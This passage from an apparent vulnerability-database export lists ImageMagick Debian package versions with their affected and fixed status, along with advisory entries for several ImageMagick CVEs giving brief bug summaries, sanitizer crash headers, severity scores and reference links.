resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-19952

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bum5-f5xb-akeg

url VCID-bw4q-dt1r-y3e4

vulnerability_id VCID-bw4q-dt1r-y3e4

summary

ImageMagick has heap-based buffer overflow in UHDR encoder
A heap-based buffer overflow in the UHDR encoder can happen due to truncation of a value and it would allow an out of bounds write.

```
================================================================
==2158399==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x521000039500 at pc 0x562a4a42f968 bp 0x7ffcca4ed6c0 sp 0x7ffcca4ed6b0
WRITE of size 1 at 0x521000039500 thread T0
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30931.json

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30931.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-30931

reference_id

reference_type

scores

value	0.00015
scoring_system	epss
scoring_elements	0.02791
published_at	2026-04-08T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02787
published_at	2026-04-07T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02779
published_at	2026-04-04T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02811
published_at	2026-04-09T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02764
published_at	2026-04-02T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03928
published_at	2026-04-12T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04026
published_at	2026-04-26T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04019
published_at	2026-04-24T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04009
published_at	2026-04-21T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03889
published_at	2026-04-18T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03878
published_at	2026-04-16T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03899
published_at	2026-04-13T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03945
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-30931

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-h95r-c8c7-mrwx

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:53:03Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-h95r-c8c7-mrwx

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-30931

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-30931

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2445900
reference_id	2445900
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2445900

reference_url

https://github.com/advisories/GHSA-h95r-c8c7-mrwx

reference_id

GHSA-h95r-c8c7-mrwx

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-h95r-c8c7-mrwx

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-30931, GHSA-h95r-c8c7-mrwx

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bw4q-dt1r-y3e4

url VCID-dabd-m3mf-3ker

vulnerability_id VCID-dabd-m3mf-3ker

summary

ImageMagick has Heap Buffer Over-Read in BilateralBlurImage
BilateralBlurImage contains a heap buffer over-read caused by an incorrect conversion. When processing a crafted image with the `-bilateral-blur` operation an out of bounds read can occur.

```
=================================================================
==676172==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50a0000079c0 at pc 0x57b483c722f7 bp 0x7fffc0acd380 sp 0x7fffc0acd370
READ of size 4 at 0x50a0000079c0 thread T0
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30935.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30935.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-30935

reference_id

reference_type

scores

value	0.00014
scoring_system	epss
scoring_elements	0.02421
published_at	2026-04-08T12:55:00Z

value	0.00014
scoring_system	epss
scoring_elements	0.02416
published_at	2026-04-07T12:55:00Z

value	0.00014
scoring_system	epss
scoring_elements	0.02417
published_at	2026-04-04T12:55:00Z

value	0.00014
scoring_system	epss
scoring_elements	0.02441
published_at	2026-04-09T12:55:00Z

value	0.00014
scoring_system	epss
scoring_elements	0.02407
published_at	2026-04-02T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02954
published_at	2026-04-12T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.03039
published_at	2026-04-26T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.03051
published_at	2026-04-24T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.03052
published_at	2026-04-21T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02931
published_at	2026-04-18T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02921
published_at	2026-04-16T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02945
published_at	2026-04-13T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02977
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-30935

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cqw9-w2m7-r2m2

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:50:49Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cqw9-w2m7-r2m2

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-30935

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-30935

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2445899
reference_id	2445899
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2445899

reference_url

https://github.com/advisories/GHSA-cqw9-w2m7-r2m2

reference_id

GHSA-cqw9-w2m7-r2m2

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cqw9-w2m7-r2m2

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-30935, GHSA-cqw9-w2m7-r2m2

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dabd-m3mf-3ker

url VCID-dt8r-gjff-pqe4

vulnerability_id VCID-dt8r-gjff-pqe4

summary

Multiple packages suffer from RUNPATH issues that may allow users in the
    "portage" group to escalate privileges.

references

reference_url	https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2005-3582.json
reference_id
reference_type
scores
url	https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2005-3582.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2005-3582

reference_id

reference_type

scores

value	0.00055
scoring_system	epss
scoring_elements	0.17079
published_at	2026-04-26T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17164
published_at	2026-04-01T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.1733
published_at	2026-04-02T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17377
published_at	2026-04-04T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17156
published_at	2026-04-18T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17248
published_at	2026-04-08T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17306
published_at	2026-04-09T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17319
published_at	2026-04-11T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.1727
published_at	2026-04-12T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17212
published_at	2026-04-13T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.1715
published_at	2026-04-16T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17192
published_at	2026-04-21T12:55:00Z

value	0.00055
scoring_system	epss
scoring_elements	0.17097
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2005-3582

reference_url	http://secunia.com/advisories/17427/
reference_id
reference_type
scores
url	http://secunia.com/advisories/17427/

reference_url	http://www.gentoo.org/security/en/glsa/glsa-200511-02.xml
reference_id
reference_type
scores
url	http://www.gentoo.org/security/en/glsa/glsa-200511-02.xml

reference_url	http://www.osvdb.org/20528
reference_id
reference_type
scores
url	http://www.osvdb.org/20528

reference_url	http://www.securityfocus.com/bid/15120
reference_id
reference_type
scores
url	http://www.securityfocus.com/bid/15120

reference_url	http://www.vupen.com/english/advisories/2005/2281
reference_id
reference_type
scores
url	http://www.vupen.com/english/advisories/2005/2281

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:4.2.7:::::::*
reference_id	cpe:2.3:a:imagemagick:imagemagick:4.2.7:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:4.2.7:::::::*

